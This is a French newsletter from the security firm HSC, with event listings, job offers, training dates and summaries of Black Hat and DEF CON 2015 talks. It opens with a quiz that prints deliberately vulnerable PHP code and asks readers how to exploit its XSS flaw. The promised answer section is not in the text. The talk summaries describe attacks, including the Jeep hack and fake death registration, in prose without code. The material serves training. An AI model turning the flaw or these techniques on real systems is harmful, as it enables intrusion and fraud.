[Newsletter HSC] N°133 - septembre 2015

Newsletter d'information de HSC newsletter at hsc-news.com
Mar 13 Oct 14:42:44 CEST 2015


========================================================================
              HSC Newsletter  --  N°133 --  septembre 2015
========================================================================



       « Le plus probable, c'est qu'on va plutôt où on ne veut pas,
         et que l'on fait plutôt ce que l'on ne voudrait pas faire. »


                                   [ Arthur Rimbaud ]





--[ Sommaire ]----------------------------------------------------------

      1. Éditorial
      2. Le saviez-vous ? La question
      3. HSC sponsor de la conférence CNIS-Mag du 22 septembre
      4. HSC by Deloitte aux Assises de la Sécurité / Atelier formation 1er oct
      5. HSC sponsor de la conférence HES (Hackito Ergo Sum) du 29-30 oct
      6. HSC sponsor de la conférence de l'ARCSI du 13 novembre
      7. Compte-rendu des conférences Blackhat et DEFCON 2015
      8. Appel à communication des GS-DAYS 2016
      9. Appel à communication de la conférence du Club 27001 2016
     10. Offre d'emploi continuité d'activité
     11. Offres d'emploi HSC pour consultants en sécurité & continuité
     12. Agenda des interventions publiques
     13. Prochaines formations HSC
     14. Actualité des associations : Club 27001, OSSIR et Clusif
     15. Le saviez-vous ? La réponse



--[ 1. Editorial - Hervé Schauer ]--------------------------------------

     La Newsletter de septembre envoyée en octobre, ce n'est pas sérieux,
 je vous l'accorde. Pas d'autres explications que le retard de votre
 serviteur, qui n'a pas d'excuses, en retard dans son éditorial et pourtant
 l'actualité ne manque pas - mais le temps manque !
 Alors fallait-il ne pas l'envoyer ? Les lecteurs seront seuls juges
 et j'accepte leurs remarques.



--[ 2. Le saviez-vous ? La question ]------------------------------------

     Lors d'un test d'intrusion, vous observez la présence d'une vulnérabilité
 de type Cross-Site Scripting (XSS) dans un code similaire à celui-la:

  <form action="form.php" method="POST">
    Username: <input type="text" value="username" name="username" />
    <input type="submit" value="Envoyer" />
  </form>
  <?php
  if(!empty($_GET['param']) && strlen($_GET['param']) <= 28 && !preg_match('/script/i',$_GET['param'])){
    echo $_GET['param'];
  }
  ?>
  </body>
  </html>
 
 Savez-vous comment est-il possible d'utiliser cette vulnérabilité afin de 
 pouvoir rediriger l'url de destination du formulaire ?

 Réponse au paragraphe 15.



--[ 3. HSC sponsor de la conférence CNIS-Mag ]---------------------------

     HSC est sponsor de la matinale sécurité de CNIS-Mag le mardi 22
 septembre à l'hôtel InterContinental Paris, 64 avenue Marceau, sur le thème
 "Cloud, Mobilité, IoT et Scada : Comment protéger le nouveau SI ouvert ?"

 Lynda Benchikh (formations) et Jean-Jacques Cayet (prestations) seront à
 votre disposition sur notre stand.

     Programme :
  8H30 : Accueil des participants
  9H00 : Risques & Vulnérabilités, Hervé Schauer (HSC by Deloitte)
  9H20 : Point de vue, Christophe Auberger (Fortinet)
  9H40 : Conseils et guides pratiques, Chadi Hantouche (Solucom)
 10H00 : Point de vue, Jean-Ian Boutin, ESET
 10H20 : Table-ronde avec François Coupez (avocat), Julien Steunou ( CERT Lexsi)
         Martine Guignard (RSSI Imprimerie Nationale et Clusif), Christophe
         Auberger (Fortinet), animé par Solange Belkhayat-Fuchs (CNIS Mag)
 11h05 : Pause
 11H25 : Point de vue, Stéphane Meynet (ANSSI)
 11H55 : Retour Terrain, Nacira Salvan (Safran)
 12H15 : La Minute Juridique : Olivier Itéanu (avocat) et Garance Mathias
         (avocat)
 12H35­ Tirage au sort de cadeaux (tablettes) autour d'une coupe de champagne

     Entrée gratuite. Inscription en ligne obligatoire :
 http://www.cnis-mag.com/inscription-cnis-event
 Métro George V ou RER Charles de Gaulle-Etoile



--[ 4. HSC by Deloitte aux Assises de la Sécurité 2015 ]-----------------
     
     HSC sera de retour aux Assises de la sécurité du 30 septembre au 3 octobre
 prochain sur le stand de Deloitte, partenaire de l'évènement.

 Lynda Benchikh sera à votre disposition pour vos projets de formation les
 jeudi 1er et vendredi 2 octobre.
 Jean-Jacques Cayet sera à votre disposition pour vos projets de prestations
 du 30 septembre au 2 octobre.

 Hervé Schauer animera l'atelier Deloitte le 1er octobre de 12h00 à 12h45
 sur "La promotion de la sécurité des SI dans l'entreprise par la formation",
 avec trois clients des formations HSC représentants différents secteurs
 d'activtés :
   - Brigitte Declerck, RSSI de l'AGIRC-ARRCO
   - Pierre Gachon, RSSI de Renault
   - André Gras, RSSI de la Coface
 Profitez de cet atelier pour comprendre l'importance de la formation dans
 la prise en compte de la sécurité de l'information par tous et à tous les
 niveaux. Pensez à vous y inscrire :
 https://backoffice.lesassisesdelasecurite.com/registration/atelier_topic.asp?f_id_atelier=1240

     Le stand Deloitte est le n°139, situé tout à droite tout au fond à partir
 de l'entrée, en face du bar. Retrouvez-nous à Monaco !



--[ 5. HSC sponsor de la conférence HES (Hackito Ergo Sum) ]-------------

     La conférence Hackito Ergo Sum se déroulera les 29 et 30 octobre
 à la cité des Sciences et de l'Industrie de la Villette.
 HSC est sponsor de cette conférence internationale de recherche sur la
 sécurité et le hacking, qui réunira des geeks du monde entier
 autour d'un programme de conférences exceptionnel (en anglais) :
 inforensique, exploitation de vulnérabilités, attaque de réseaux mobiles 4G
 et LTE, sécurité des aéroports, rétroingéniérie de logiciels malfaisants
 sécurité des langages et des développements, etc.
 Toutes les infos : http://2015.hackitoergosum.org

 Venez nous rejoindre sur notre stand HSC ! Hervé Schauer sera à votre
 disposition pour vous présenter nos formations techniques en sécurité,
 et répondre à toutes vos questions.


 Inscriptions en ligne sur :
 https://www.eventbrite.fr/e/hackito-ergo-sum-2015-registration-17648328626

 

--[ 6. HSC sponsor de la conférence de l'ARCSI du 13 novembre ]----------
      
      Les 9èmes rencontres de l'ARCSI se dérouleront à l'École du Val-de-Grâce
 de 8h30 à 17h30 le 13 novembre prochain sur le thème "Renseignement et
 Liberté Numériques".
 HSC est sponsor de cette manifestation et sera présent toute la journée avec
 un stand pour répondre à vos besoins.
 
 Inscriptions en ligne sur :
 http://www.arcsi.fr/inscription-colloque-151113/form.html



--[ 7. Compte-rendu des conférences Blackhat et DEFCON 2015 ]------------

 Attacking Interoperability - An OLE edition
 ==================================================
 Par Haifei Li et Bing Sun

 Cette conférence présente les vulnérabilités pouvant être exploitées
 par ce système d'inclusion d'objets externes dans des documents.
 Suite à un récapitulatif des précédents exploits utilisant ce mécanisme,
 les conférenciers présentent de manière succincte les principales méthodes
 utilisées afin de pouvoir utiliser ce type d'objets dans des attaques ciblées
 ou lors de pentest. Enfin, on fini avec la présentation de l'ouverture d'un 
 document office qui lance automatiquement la calculatrice Windows.

 These are not your grand daddys cpu performance counters
 - CPU hardware performance counters for security
 ==================================================
 Par Nishad Herath et Anders Fogh

 Durant cette présentation, les auteurs présentent les bénéfices de
 l'utilisation des "Performance Monitoring Counters" présent dans
 l'architecture Intel afin de pouvoir les utiliser pour détecter des
 exploits sur le système hôte. En effêt, en configurant le type d'
 évènement pris en comptes il leur a été possible de détecter des
 attaques de type RowHammer ou encore des Rop chain.

 Ropinjector: using return oriented programming for polymorphism and antivirus
 evasion
 ==================================================
 Par Giorgos Poulios & Christoforos Ntantogian & Christos Xenakis

 Cette conférence présente une nouvelle technique pour le contournement des
 antivirus se basant sur des signatures. Suite à une présentation des
 informations de base (sur le fonctionnement des signatures, du ROP), le
 conférencier présente Ropinjector, une solution permettant de remplacer
 n'importe quelle shellcode par un shellcode entièrement en ROP permettant ainsi
 de contourner les signatures des AV. La solution se base sur une traduction du
 shellcode initial dans une  représentation intermédiaire qui est ensuite
 retraduit en gadgets ROP. Suite à cela, la présentation finit sur des
 statistiques de détection de cette solution.

 The memory sinkhole - unleashing an x86 design flaw allowing universal
 privilege escalation
 ==================================================
 Par Christopher Domas

 Christopher Domas commence la présentation par une élévation de privilège sous
 Linux, mais n'expliquant aucunement l'origine de la vulnérabilité
 (plus tard, on apprendra qu'il s'agit d'un rootkit en Ring -2). Suite à cela,
 il présente les différents niveaux de privilèges étant accessibles au niveau du
 processeur et présente en détail le Ring-2 dédié au System Management Mode
 (SSM) et les mécanismes de sécurité mis en place pour éviter d'interagir
 arbitrairement avec lui. Cependant, en analysant les  documents d'Intel, il a
 découvert qu'en déplaçant l'adresse où sont "mappés" les registres APIC, il est
 possible pour lui d'attaquer directement la SMRAM et d'y injecter un code
 malfaisant. Avant d'obtenir ce résultat, les différentes itérations ayant
 été nécessaires sont présentées.

 Detecting Randomly Generated Strings; A Language Based Approach
 ===============================================================
 Par Mahdi Namazifar

 L'objectif de cette conférence était de présenter un modèle permettant de
 savoir si pour une chaîne donnée, celle-ci était une chaine d'octet
 aléatoire ou provenaient de mots courants présents dans des dictionnaires.
 Pourquoi cette problématique dans un premier lieu ? Tout simplement pour savoir
 s'il était possible de savoir si les noms de domaines utilisés comme C2C par
 des malwares pouvaient être modélisés ou étaient tout simplement aléatoires.

 I Am Packer And So Can You
 ==========================
 Par Mike Sconzo

 La conférence a pour objectif de présenter un programme développé par Mike
 Sconzo permettant de détecter le type de packer utilisé et le compilateur
 utilisé (équivalent de PeID) pour un binaire en ayant pour objectif
 la possibilité de créer des signatures afin de pouvoir étendre la base de
 données de l'outil. Suite à la méthodologie et aux technologies utilisées
 (Capstone), il présente les résultats de son outil sur les binaires APT1 et sur
 différentes versions du malware Zeus.

 Key-Logger, Video, Mouse - How To Turn Your KVM Into a Raging Key-logging
 =========================================================================
 Par Yaniv Balmas et Lior Oppenheim

 Les deux conférenciers de Checkpoint ont commencé par une présentation générique
 et abstraite d'un KVM hardware et de l'évolution hardware de ceux-ci. Suite à
 cela, ils ont présenté la méthodologie utilisée pour la rétro-conception du
 code utilisé par l'équipement (qui pourrait s'appliquer de manière générique
 sur n'importe quelle autre équipement) et les différentes étapes qui ont été
 nécessaire pour comprendre le mécanisme de mis à jour de l'équipement afin de
 pouvoir compromettre le code du micro-controlleur. Suite à cela, ils finissent
 par une présentation de leur code qui permet de prendre le contrôle à distance
 d'une machine connectée au KVM mais n'ayant aucune connexion internet pour
 simuler un ordinateur sur un réseau confidentiel.

 Abusing native Shims for Post Exploitation
 ==========================================
 Par Sean Pierce

 La technologie Shim permet d'assurer une rétro-compatibilité des exécutables
 entre les différentes versions de Windows.
 Cependant, en plus de proposer un mécanisme de rétro-compatibilité, cette
 technologie permet entre autre d'abuser de celle-ci afin de réduire le niveau
 de sécurité d'une application (un shim doit-être défini par application).
 Il montre alors quelques exemples des plus simples, de l'injection d'une
 DLL pour faire un keylogger au sein du client SSH Putty à la
 désactivation de l'ASLR et du DEP sur certains processus Windows.

 REpsych: Psychological Warfare in Reverse Engineering
 =====================================================
 Par Chris Domas

 Après avoir fait une conférence à BlackHat sur une vulnérabilité présente dans
 les anciennes architectures CPU Intel, cette fois-ci Chris Domas revient pour
 présenter des outils qu'il a développés pour démotiver au maximum l'analyse
 d'un binaire. Dans un premier temps, il présente de nouveau son outil Movfuscator
 (présenter à Recon 2015) permettant de remplacer toutes les instructions par un
 enchainement de mov uniquement. Suite à cela, étant donné que la plupart des
 analyses sont réalisées au travers d'IDA, il a analysé le mécanisme utilisé
 pour générer les graphes d'un binaire. Son objectif étant de pouvoir prendre
 le contrôle de celui-ci et de réaliser un "ASCII". Comme lors de la conférence
 sur Sinkhole (cf: CR Black-Hat), il présente les différentes itérations
 nécessaires pour atteindre son objectif. Il conclut enfin la présentation par
 la présentation d'un logiciel malfaisant recherchant sur le disque les photos
 afin de pouvoir modifier son graphe et ressembler à la photo en question.

 Attacking ecmascript engines with redefinition
 ==================================================
 Par Natalie Silvanovich

 Natalie Silvanovich du Project Zero (Google) commence par la présentation
 de la redéfinition de méthodes dans les moteurs Ecmascript et les conséquences
 que cela peut avoir dans un navigateur (en l'occurrence du JavaScript). Suite a
 cela, elle présente la redéfinition de fonctions dans ActionScript et les
 vulnérabilités découvertes. Elle profite de cette phase pour présenter les
 méthodes internes des objets ActionScript étant utilisés dans certaines
 opérations de base pouvant amener à des vulnérabilités.

 ==============================================================================
 Defeating pass-the-hash: separation of powers
 Seth Moore & Baris Saydag
https://www.blackhat.com/docs/us-15/materials/us-15-Moore-Defeating%20Pass-the-Hash-Separation-Of-Powers.pdf
 ==============================================================================

 Cette conférence de Microsoft reprenait toutes les innovations en termes de 
 sécurité apportées par Windows 10.
 La plus notable d'entre elles est l'introduction du système du Virtual Trust 
 Levels (VTL). 
 Auparavant deux espaces mémoire étaient utilisés : ring 0 pour le noyau et ses 
 pilotes et ring3 pour les processus utilisateurs, avec comme propriété que les 
 processus en ring 0 ont accès à toute la mémoire en ring0 et ring3, ce qui 
 permet a des programmes comme mimikatz via un pilote de récupérer des
 condensats dans la mémoire.

 Désormais, une nouvelle dimension est ajoutée avec les VTL. Le système 
 d'exploitation utilise l'espace mémoire ring0 et ring3 dans l'environnement
 VTL0. 
 De nouveaux environnements VTL1,VTL2 ... peuvent maintenant contenir de la 
 mémoire ring0 ou ring3 qui soit totalement inaccessible depuis l'environnement 
 VTL0.

 Ce changement d'architecture permet désormais d'isoler le nouveau gestionnaire
 des identifiants Windows (Credguard) du noyau, rendant impossible la 
 récupération des condensats en mémoire même en utilisant un pilote noyau 
 (comme mimikatz).

 Une seconde amélioration consiste a utiliser la RFC6113 de Kerberos permettant
 de combiner les identifiants de l'utilisateur avec celui de sa machine.
 Ce système permet donc de n'autoriser un utilisateur a se connecter que depuis
 une machine autorisée. Les identifiants de la machine étant stockés dans 
 Credguard, l'utilisateur est forcé d'utiliser Credguard pour s'authentifier.

 Ce nouveau système associé à un chiffrement du disque avec Bitlocker et TPM, 
 ainsi qu'une utilisation de l'authentification forte avec un token physique 
 permet d'empêcher la plupart des attaques sur l'authentification Windows.

 Néanmoins Windows 10 fournit les outils et moyens pour le faire encore faut-il 
 les utiliser.

 ==============================================================================
 Remote exploitation of an unaltered passenger vehicle
 Charlie Miller & Chris Valasek
 http://illmatics.com/Remote%20Car%20Hacking.pdf
 ==============================================================================

 Charlie Miller & Chris Valasek ont fait salle comble pour présenter leurs 
 travaux sur une Jeep Cherokee de 2014. 

 Celle-ci possède un ordinateur de bord UConnect qui en option permet d'avoir un
 routeur Wifi connecté à Internet. Un simple scan réseau a permis de déterminer
 qu'un service DBus est en écoute sur le port 5666. Ce service permet sans 
 authentification préalable d'exécuter des commandes sur le système UConnect.

 Une fois celui-ci compromis, les attaquants avaient le contrôle du GPS, 
 de la ventilation, du volume radio, mais pas encore du système de contrôle 
 physique du véhicule.

 Outre le Wifi comme point d'entrée pour leurs attaques, les chercheurs ont 
 découvert que ces voitures étaient accessibles via des bornes 3G du même 
 opérateur (spring) que celui des Jeeps, permettant ainsi une compromission 
 massive des voitures.

 Dans un second temps, les chercheurs ont tenté de rebondir sur le système de
 contrôle de la voiture. Après démontage de la carte, une puce en contact avec
 le système de contrôle et le système UConnect a été identifiée. Celle-ci
 permet d'envoyer des trames CAN via un périphérique série. Le firmware de la 
 puce a donc été mis à jour afin de permettre l'analyse dynamique de celui-ci.

 Une fois les trames et leurs actions identifiées, les attaquants étaient en 
 mesure de contrôler le volant, la vitesse et les freins des véhicules 
 vulnérables.

 Suite à ces recherches, Chrysler a rappelé 1,4 million de véhicules afin de 
 corriger cette faille. 

 ==============================================================================
 When IOT attacks: hacking a linux-powered rifle
 Runa A. Sandvik  &  Michael Auger
https://www.blackhat.com/docs/us-15/materials/us-15-Sandvik-When-IoT-Attacks-Hacking-A-Linux-Powered-Rifle.pdf
 ==============================================================================

 La société TrackingPoint est spécialisée dans la fabrication d'armes avec
 lunette de précision intelligente. Contrairement à l'idée répandue, une balle
 tirée depuis une arme à feu ne part pas en ligne droite, mais est déviée selon
 le vent et la distance. Un tireur embusqué doit tenir compte de ces paramètres
 afin de viser correctement.

 Ces lunettes intelligentes s'adaptent automatiquement en fonction des capteurs
 de distance et de vent et disposent de fonctionnalités réseau afin de partager 
 des photos de ses exploits.

 La fonctionnalité Wifi est mal implémentée et utilise un SSID fixe et un mot de
 passe faible qui ne peut pas être changé. Une fois celui-ci compromis, une API
 est accessible et permet d'accéder à certaines fonctionnalités comme le 
 changement du nombre de balles restantes affichées.

 Afin d'obtenir plus d'accès, les attaquants ont démonté le fusil et identifié
 un accès UART permettant d'obtenir un accès série sur le système
 d'exploitation. Une fois les branchements effectués, un mot de passe était
 malheureusement demandé.

 Un autre accès physique a été découvert permettant l'accès direct au système 
 de fichier. Cet accès a permis la découverte de nouvelles API de contrôle et
 une clé GPG permettant l'envoi de mises à jour du système, permettant ainsi
 la compromission du fusil.
 L'attaquant a désormais la possibilité de modifier à sa guise le système de 
 visée permettant ainsi d'épargner d'innocentes biches ou de tromper le tireur
 et de provoquer un tir ami.

 ==============================================================================
 I Will Kill You
 Chris Rock
https://media.defcon.org/DEF%20CON%2023/DEF%20CON%2023%20presentations/Chris%20Rock/DEFCON-23-Chris-Rock-I-Will-Kill-You-How-to-Get-Away-with-Mu.pdf
 ==============================================================================

 Comment provoquer une mort administrative?
 L'auteur de cette conférence s'est efforcé de répondre à cette question pour
 un citoyen américain et australien.

 Deux documents sont nécessaires, un certificat de décès délivré par un médecin
 et un formulaire d'enregistrement de décès enregistrés par un directeur
 funéraire.

 Ces deux documents peuvent être remplis en ligne sur la plateforme américaine 
 ERDS ou le registre australien des naissances décès et mariage.
 Afin de s'enregistrer auprès de ces plateformes en tant que médecin,
 les informations demandées sont publiques et accessibles sur d'autres sites.
 Il est donc possible pour un attaquant d'usurper ces informations afin
 d'accéder au site et de générer de faux certificats de décès.

 Afin de générer les formulaires d'enregistrement de décès, Chris Rock s'est 
 enregistré avec succès sur le système australien en tant que directeur
 funéraire.
 Le système américain est différent selon les états et peut nécessiter d'un 
 simple examen à un diplôme.

 Une fois la mort administrative provoquée, il est possible de réclamer
 l'héritage du "décédé". 
 La loi n'étant pas prévue pour une résurrection, un faux "décédé" a, aux
 États-Unis, trois ans pour  contester son décès. Passé ce délai, aucune
 résurrection administrative possible.



--[ 8. Appel à communication des GS-DAYS 2016 ]--------------------------
      
     HSC sera présent comme chaque année aux GS-DAYS 2016 le 7 avril 2016,
 et Hervé Schauer est membre du comité de programme de la conférence.
 Afin de ne pas surcharger cette newsletter très longue, nous vous invitons
 à consulter l'appel à communication sur :
https://www.globalsecuritymag.fr/GS-DAYS-Appel-a-communication-de,20150914,55600.html



--[ 9. Appel à communication de la conférence du Club 27001 ]--------------

     Le Club 27001 (http://www.club-27001.fr/), association à but non
 lucratif, organise à Paris le jeudi 7 avril 2016 sa neuvième conférence
 annuelle autour des usages des normes ISO 2700X. Cette conférence se
 déroulera à Paris  à l'espace Saint-Martin dans le cadre des
 GS-DAYS (http://www.gsdays.fr).

 La conférence annuelle du Club 27001 privilégie les retours d'expérience
 dans l'utilisation des normes de la série ISO 27000, qu'il s'agisse de la
 mise en oeuvre d'une des normes, leur usage y compris sans certification,
 les difficultés rencontrées et les intérêts perçus.

     Voici les thèmes sur lesquels nous attendons des propositions, sans
 que ceux-ci soient exhaustifs :

  - Mise en oeuvre d'un SMSI
     . Retour d'expérience
     . Migration des version 2055 vers les versions 2013 des normes ISO27001
       et ISO27002
     . Reprise de l'existant
     . Comment engager sa direction générale
     . Comment surmonter la peur du SMSI
  - Gestion des risques liés à la sécurité de l'information
     . Retour d'expérience de mise en oeuvre de l'ISO 27005
     . Technique d'entretien et d'implication des métiers
     . Échelles et calcul du risque
     . Interactions avec les autres gestions des risques : opérationnels,
       industriels, CHSCT, financiers, etc.
     . Intérêts de l'ISO 27005 dans les projets, les systèmes embarqués, etc.
     . Usage d'ISO27005 vs usage d'EBIOS, de Mehari ou de RiskIT
  - Audits internes
     . Mise en place d'audits internes pour le SMSI
     . Mutualisation des audits internes ISO 27001 (avec ISO 9001, etc)
     . Utilisation de l'ISO 19011 et ISO 27006
  - Gestion des incidents liés à la sécurité
     . Retours d'expérience
     . Usage de l'ISO 27035
     . Liens avec d'autres référentiels (NIST SP800-61rev1, etc)
  - Indicateurs, métriques et tableaux de bord
     . Retours d'expérience
     . Usage de l'ISO 27004
     . Liens avec d'autres référentiels (TBSSI de l'ANSSI, NIST SP800-50, etc)
  - Liens entre ISO 27001 et d'autres normes, référentiels ou règlements :
     . Utilisations d'ISO 27001 dans le cadre ou concomitamment à d'autres
       référentiels de sécurité : OIV et arrêtés sectoriels, RGS, PCI-DSS,
       ISAE3402, Bâle II/Solvency II, HDS (Hébergeur de données de santé),
       ARJEL, WLA, etc.
     . Coordination entre la SSI (ISO 27001) et la continuité d'activité
       ISO 22301 (SMCA)
     . Systèmes de Management Intégrés (ISO 9001, 14001, 20000-1, etc) avec
       ISO 27001
     . Cohabitation ISO27001 et ISO 20000-1 / ITIL (services informatiques),
       ISO 27013
     . Mutualisation, opposition, complémentarité, déclencheur, etc.
     . CobiT (audit informatique, contrôle interne)
     . Applications sectorielles de l'ISO 27001 : télécommunications,
       santé (27011, 27799, etc)

     Les propositions doivent faire part d'un retour d'expérience pratique,
 et ne doivent pas être la présentation d'une offre de service, d'un
 produit ou plus généralement d'une solution commerciale. Le comité de
 programme sera sensible à l'aspect pratique des propositions. Cependant, les
 propositions présentant une analyse ou un comparatif fondé sur des tests
 scientifiques pourraient être acceptées.

 Les présentations feront de 35 à 45 minutes et seront en français ou en
 anglais.

 Contenu des soumissions à envoyer à conference at club-27001.fr :
    - Nom de l'auteur, biographie et affiliation
    - Synopsis d'une page maximum de l'intervention avec un plan de celle-ci
    - Format libre

 Calendrier 
    - 17 janvier 2016 : date limite de réception des soumissions
    - 14 février 2016 : notification aux auteurs et
                        publication du pré-programme
    - 28 février 2016 : publication du programme définitif
    - 24 mars 2016 : réception des présentations
    - 7 avril 2016 : conférence


 Le comité de programme est composé des membres de l'association élus au
 conseil d'administration, soit :
     - Bertrand Augé, Kleverware
     - Thomas Bousson, On'X-Edelweb
     - Claire Cossard, CNAM-TS
     - Francis Delbos, ID Nouvelles
     - Eric Doyen, Humanis
     - Emmanuel Garnier, Systalians
     - Loïc Guézo, Trendmicro
     - Thomas Lebouc, Ipanema
     - Florence Le Goff, Solucom
     - Carl Roller, Akamai
     - Hervé Schauer, HSC



--[ 10. Offre d'emploi consultant en continuité d'activité ]-------------

     HSC by Deloitte recherche un consultant en continuité d'activité afin
 de développer l'offre et répondre aux demandes croissantes des clients
 sur l'ISO 22301.
 Les notions d'indépendance et de travail en équipe sont fondamentales chez
 HSC by Deloitte. Le candidat doit être passionné, aimer partager son
 expérience et être capable de faire progresser ses collègues sur son sujet
 de prédilection. Le consultant sélectionné pourra bénéficier de l'expérience
 d'HSC by Deloitte, considéré comme leader d'opinion sur l'ISO 27001 et la
 gestion des risques en sécurité.

 Avec le développement de l'offre « Continuité d'activité », le consultant
 participera à l'animation des formations RPCA, ISO 22301 Lead Implementer,
 ISO 22301 Lead Auditor, et gestion de crise IT/SSI.

 Dans le cadre de sa prise de fonction, il suivra les formations ci-dessus et
 d'autres comme ISO 27005 Risk manager et/ou des formations ISO27001.

     Le candidat devra justifier entre minimum 3 ans et maximum 6 ans
 d'expérience sur le sujet : BIA, stratégies de continuité, DRP, gestion
 de crise, plan de repli utilisateurs (PRU), exercices-tests, etc.
 Des connaissance en sécurité des systèmes d'informations et/ou sur les
 systèmes de management constituent un avantage, mais ne sont pas
 indispensables.

 Le poste est basé à Neuilly-sur-Seine (Paris), au pied du métro Pont de
 Neuilly (ligne n° 1). Si vous souhaitez proposer votre candidature, nous
 vous remercions d'envoyer votre CV en texte ASCII (pas de .doc ni .docx) par
 courrier électronique à cv at hsc.fr.



--[ 11 . Offres d'emploi HSC pour consultants en sécurité ]---------------

     HSC by Deloitte recherche des consultants brillants, débutants ou
 expérimentés, avides de partager et de s'épanouir dans une équipe
 indépendante, pluridisciplinaire, qui couvre tous les aspects liés à la
 sécurité et continuité, des tests d'intrusion à l'expertise judiciaire, de
 la rétro-ingénierie à la gouvernance, des systèmes industriels et embarqués
 à la gestion des risques, des technologies sans-fil à la résilience, de
 l'inforensique à l'ingénierie sociale, etc., pour des missions d'expertise
 variées et haut de gamme.

     Les ingénieurs sélectionnés pourront être formés à la sécurité par HSC
 (intrusion, inforensique, Windows, SCADA, ISO27001, ISO22301, ISO27005,
 EBIOS, etc.), soit 2 à 6 semaines de formations suivies dans le cadre de
 la prise de fonction.

     HSC by Deloitte recherche également des stagiaires pour des stages de
 pré-embauche.

     Tous les postes sont basés à Neuilly-sur-Seine (Paris), au pied du métro
 Pont de Neuilly (ligne n° 1). Si vous souhaitez proposer votre candidature,
 nous vous remercions d'envoyer votre CV en texte ASCII (pas de .doc ni .docx)
 par courrier électronique à cv at hsc.fr.



--[ 12. Agenda des interventions publiques ]-------------------------------

 - 15 septembre - AFCDP - Paris
   Conférence "Du CIL au DPO : de la théorie à la pratique"
   "Projet de règlement européen, comparaison du DPO avec le CIL"
   par Frédéric Connes et Amélie Paget

 - 17 septembre - CDSE - Paris
   "Sécurité des SCADA et contexte LPM/OIV"
   par Hervé Schauer et Christophe Renard

 - 23 septembre - RSSIA - Bordeaux
   "Introduction à la sécurité informatique des systèmes industriels"
   par Hervé Schauer
   http://www.clusir-aquitaine.fr/les-7iemes-rencontres-securite-des-systemes-dinformation-en-aquitaine-rssia-2015/

 - 1er octobre à 10h00 - Assises de la sécurité à Monaco
   Participation à la table-ronde Wallix "Gestion des Comptes à Privilèges :
   Cybersécurité ou Contribution aux réglementations" par Hervé Schauer

 - 1er octobre à 12h00 - Assises de la sécurité à Monaco
   Animation de la table-ronde Deloitte "La promotion de la sécurité des
   SI dans l'entreprise par la formation" par Hervé Schauer
   https://backoffice.lesassisesdelasecurite.com/registration/atelier_topic.asp?f_id_atelier=1240

 Retrouvez l'agenda de nos interventions publiques sur
 http://www.hsc.fr/conferences/agenda.html.fr



--[ 13. Prochaines formations HSC ]----------------------------------------

     Nos prochaines formations sont les suivantes :

 - Paris
        ISO 27005 Risk Manager    ..............    : 9 au 11 septembre (#)
        Essentiels de l'ISO22301    ............    : 14 septembre
        ISO 27001 Lead Auditor    ..............    : 14 au 18 septembre (#)
        Inforensique Windows (SANS FOR408/GIAC GCFE): 14 au 18 septembre (*)(#)
        ISO 27001 Lead Implementer    ..........    : 21 au 25 septembre (#)
        Sécurité du Cloud Computing    .........    : 21 au 22 septembre
        Essentiels techniques de la SSI    .....    : 24 et 25 septembre
        Correspondant Informatique et Libertés      : 28 au 30 septembre (@)
        Protéger les applis web (DEV522 /GIAC GWEB) : 28 sep au 2 oct (*)(#)
        ISO 22301 Lead Implementer    ..........    : 28 sep au 2 octobre (#)
        Essentiels de l'ISO27001:2013    .......    : 5 octobre
        Tests d'intrusion des applications web et
        hacking éthique (SANS SEC542 / GIAC GWAPT)  : 5 au 9 octobre (#)
        Formation RSSI    ......................    : 5 au 9 octobre
        ISO 27005 Risk Manager    ..............    : 7 au 9 octobre (#)
        Formation CISSP    .....................    : 12 au 16 octobre (#)(C)
        Techniques de hacking, exploitation de failles
        et gestion des incidents (SEC504/GCIH)      : 12 au 16 octobre (*)(#)
        Tests d'intrusion avancés, exploits,
        hacking éthique (SANS SEC560 / GIAC GPEN)   : 19 au 23 octobre (*)(#)
        ISO 22301 Lead Auditor    ..............    : 26 au 30 octobre (#)
        Fondamentaux & principes de la SSI
        (SANS SEC401/GIAC GSEC)   ..............    : 26 au 31 octobre (*)(#)
        Analyse Inforensique avancée et réponse aux
        incidents (SANS FOR508 / GIAC GCFA)    .    : 2 au 6 novembre (*)(#)
        EBIOS Risk Manager    ..................    : 3 au 5 novembre (#)
        PSSIE & RGS v2   .......................    : 6 novembre
        Sécurité du WiFi    ....................    : 9 et 10 novembre (*)
        DNSSEC    ..............................    : 12 et 13 novembre (*)
        Essentiels Informatique et Liberté   ...    : 13 novembre
        ISO 27001 Lead Implementer    ..........    : 16 au 20 novembre (#)
        Inforensique ordiphones/tablettes (FOR585)  : 16 au 20 novembre (*)(#)
        Sécurité SCADA    ......................    : 16 au 18 novembre (*)
        ISO 27005 Risk Manager    ..............    : 23 au 25 novembre (#)
        Essentiels de l'ISO27001:2013    .......    : 26 novembre
        Tests d'intrusion avancés des applications
        web et hacking éthique (SANS SEC642)  ...   : 23 au 27 novembre (*)
        Expert Sécurité Linux LPI 303   ........    : 23 au 27 novembre (*)(#)
        Droit de la sécurité informatique    ...    : 26 et 27 novembre
        ISO 27001 Lead Auditor    ..............    : 30 nov au 4 décembre (#)
        Outils et techniques d'analyse
        (SANS FOR610/GIAC GREM)   ..............    : 30 nov au 5 décembre (*)
        Correspondant Informatique et Libertés      : 2 au 4 décembre (@)
        Mesures de sécurité ISO 27002:2013   ...    : 7 et 8 décembre
        Indicateurs & tableaux de bord SSI/ISO27004 : 9 décembre
        Gestion des incidents de sécurité/ISO27035  : 10 décembre
        Gestion de crise IT/SSI    .............    : 11 décembre
        Formation CISSP    .....................    : 7 au 11 décembre (#)
        Tests d'intrusion avancés, exploitation de
        failles et hacking éthique (SEC660/GXPN)    : 7 au 12 décembre (*)(#)
        ISO 27005 Risk Manager    ..............    : 14 au 16 décembre (#)
        Sécuriser Windows (SANS SEC505/GIAC GCWN)   : 14 au 18 décembre (*)(#)
        Risk Manager Avancé    .................    : 17 et 18 décembre
        ISO 27005 Risk Manager    ..............    : 20 au 22 janvier 2016 (#)
        PKI : principes et mise en oeuvre    ...    : 18 au 20 mai 2016 (*)
        Essentiel de PCI-DSS    ................    : 30 mai 2016
        Inforensique réseau avancée (SANS FOR572)   : 3 au 7 octobre 2016 (*)(#)

 (*) : formations avec travaux pratiques, avec un ordinateur par stagiaire
 (#) : formations certifiantes par LSTI, ISC2, GIAC ou LPI
 (@) : formation labellisée par la CNIL (www.cnil.fr)
 (C) : session de formation complète

 - Luxembourg
        ISO 27001 Lead Implementer    ..........    : 19 au 23 octobre (#)
        ISO 27005 Risk Manager    ..............    : 18 au 20 mai 2016 (#)
        Formation CISSP    .....................    : 27 juin au 1er juillet (#)
        ISO 22301 Lead Implementer    ..........    : second semestre 2016 (#)

